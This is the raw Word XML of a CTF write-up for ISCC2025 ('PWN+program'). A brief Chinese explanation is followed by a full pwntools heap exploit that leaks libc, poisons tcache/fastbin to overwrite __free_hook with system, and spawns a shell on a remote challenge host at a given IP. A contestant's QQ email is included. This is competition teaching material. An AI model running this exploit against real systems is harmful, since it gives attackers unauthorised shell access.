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4424" w14:textId="62432241" w:rsidR="003D0756" w:rsidRPr="00C346CE" w:rsidRDefault="00AF064E" w:rsidP="00C346CE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C346CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00C346CE">
        <w:t>SCC202</w:t>
      </w:r>
      <w:r w:rsidR="0084766E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C346CE">
        <w:t xml:space="preserve"> WriteUp </w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7" w:rsidRPr="00C346CE">
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00C346CE">
        <w:t>模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="2DAF0343" w:rsidR="00AF064E" w:rsidRPr="00B25A25" w:rsidRDefault="00B25A25" w:rsidP="00AF064E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25A25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>吊椅宝宝赚钱养小猫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习翼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1962389612</w:t>
      </w:r>
      <w:r w:rsidR="00DA4657">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@qq</w:t>
      </w:r>
      <w:r w:rsidR="00DA4657">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3B846" w14:textId="711C0D1E" w:rsidR="007374EF" w:rsidRDefault="003F41CA" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="007374EF" w:rsidRPr="007374EF">
        <w:t>program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="69C1A429" w:rsidR="00AF064E" w:rsidRPr="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70401E05" w14:textId="5A031DAD" w:rsidR="007374EF" w:rsidRDefault="007374EF" w:rsidP="007374EF">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>申请⼀个⼤⼩为 0x500 的堆块 和⼀个⼤⼩为 0x20 的堆块防⽌⼤堆块被释放的时候融合，然后释放⼤堆块到 unsortbin ⾥⾯，泄露 main_area 的地址。然后申请堆块再释放，布置 tachebin ⾥⾯的堆块，指向 free_hook ，修改 free_hook 指 针指向 system 。再申请⼀个堆块，编辑内容为 b'/bin/sh\x00' 释放它得到 shell 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53352922" w14:textId="77777777" w:rsidR="007374EF" w:rsidRDefault="007374EF" w:rsidP="007374EF">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46369C95" w14:textId="77777777" w:rsidR="007374EF" w:rsidRDefault="007374EF" w:rsidP="007374EF">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0834D3EE" w14:textId="77777777" w:rsidR="007374EF" w:rsidRDefault="007374EF" w:rsidP="007374EF">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="23B422E6" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF9E468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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC5B5F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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A3371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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import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374EF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</w:p>
    <w:p w14:paraId="4364270E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743B15FB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定义与目标程序交互的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C72C7B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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>size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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09022C8D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io.sendlineafter(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'choice:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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'1'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3373C3BD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io.sendlineafter(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'index:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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(index).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28EB12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io.sendlineafter(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'size:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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(size).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF0154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7F72F404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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>delete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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78082B12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io.sendlineafter(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'choice:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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'2'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6C6947D9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io.sendlineafter(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'index:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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(index).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF648D8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0C55476F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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>edit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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>length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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2334F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io.sendlineafter(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'choice:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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'3'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6F972A33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io.sendlineafter(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'index'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(index).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AD1D4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io.sendlineafter(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'length:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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(length).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9069B1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io.sendafter(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'content:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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, content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B335D35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1C8B6CAF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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD5326B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io.sendlineafter(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'choice:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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'4'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2CFBF93B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io.sendlineafter(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'index:</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n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(index).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995156A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47635A33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配置环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988366F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context.log_level </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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'info'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D2D59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libc </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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ELF(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'/home/lenovo/Pwn/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc.so.6'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6DE16DD2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io </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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remote(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'101.200.155.151'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12300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7C3EFDDB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179DC268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第一阶段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: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泄露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 libc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基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37CF66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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>leak_libc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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C37B2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log.info(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正在泄露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 xml:space="preserve"> libc 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基址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..."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579197FB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申请多个块用于后续操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07805CBE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7374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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9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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62728F5B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add(i, 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200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5FF287F3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</w:p>
    <w:p w14:paraId="765652B6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释放多个块进入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 tcache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFFD5C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7374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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7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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297AC55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    delete(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB00A9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delete(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7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54152DAF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</w:p>
    <w:p w14:paraId="4B8667B1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查看已释放的块以泄露地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44D853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show(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7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322BDEFD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leak </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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u64(io.recv(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6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).ljust(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8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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58166D0B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libc_base </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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leak </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-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1ecbe0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6236BB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libc.address </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA87D1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log.success(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f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 xml:space="preserve">"Libc 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基址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 xml:space="preserve">: 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{</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(libc_base)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}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4B991559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</w:p>
    <w:p w14:paraId="4AD4C88E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7374EF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libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EC587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178CB2FF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第二阶段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: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构建利用链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBAA25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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B0830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log.info(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正在构建利用链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..."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3FF5DC80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重新分配所有块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618E3C7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7374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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8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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E73BDD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add(i, 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200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28F03659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</w:p>
    <w:p w14:paraId="2261BC7D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申请小块用于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 fastbin attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88DE2E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7374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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9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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC04B3A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add(i, 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40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5F12B29B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</w:p>
    <w:p w14:paraId="6B5AC989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构造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 fastbin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链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F275D2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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9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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349EC63E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    delete(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2800E7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delete(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7BB78996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delete(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4B26405E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delete(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  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双重释放，形成循环链表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580402D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</w:p>
    <w:p w14:paraId="742AB2A5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重新分配块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25145BE7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7374EF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i </w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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9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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19167F6B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add(i, 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40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0F22DED3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add(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40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47CB0BE9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</w:p>
    <w:p w14:paraId="5394B984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修改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 fd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指针，指向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 __free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DEEEC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edit(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16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, p64(libc.sym[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'__free_hook'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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E391C6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</w:p>
    <w:p w14:paraId="695C420D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分配到接近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 __free_hook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的块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EE6DC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add(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40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3ACB3C3F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add(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40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21D30AD0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add(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40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  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这个块应该覆盖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 __free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852A3CE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</w:p>
    <w:p w14:paraId="5562F24C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将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 __free_hook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指向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 system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函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF62CFE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edit(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20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, p64(libc.sym[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'system'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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3228EEE1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log.info(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f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 xml:space="preserve">"__free_hook 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地址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 xml:space="preserve">: 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{</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(libc.sym[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'__free_hook'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])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}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67610913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log.info(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f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 xml:space="preserve">"system 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地址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 xml:space="preserve">: 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{</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(libc.sym[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'system'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])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}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10A607DB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</w:p>
    <w:p w14:paraId="4C8809E4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准备触发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 system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0458C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pause()  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手动暂停，检查状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A8DDE8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edit(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3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20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'/bin/sh</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00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3655E326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delete(</w:t>
      </w:r>
      <w:r w:rsidRPr="007374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3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)  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触发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 system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F808CA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2175FB03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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B5C75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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0886E174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leak_libc()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983D6AA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exploit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF0217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io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FE706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249EB3A3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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__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374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>==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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w: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</w:p>
    <w:p w14:paraId="775E419D" w14:textId="77777777" w:rsidR="007374EF" w:rsidRPr="007374EF" w:rsidRDefault="007374EF" w:rsidP="007374E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7374EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="77777777" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00EA3779" w:rsidP="00EA3779"/>
    <w:sectPr w:rsidR="00EA3779" w:rsidRPr="00EA3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ED00A" w14:textId="77777777" w:rsidR="0074256E" w:rsidRDefault="0074256E" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F2C058C" w14:textId="77777777" w:rsidR="0074256E" w:rsidRDefault="0074256E" w:rsidP="005B6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A0AA1" w14:textId="77777777" w:rsidR="0074256E" w:rsidRDefault="0074256E" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="289A62E0" w14:textId="77777777" w:rsidR="0074256E" w:rsidRDefault="0074256E" w:rsidP="005B60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C5029"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
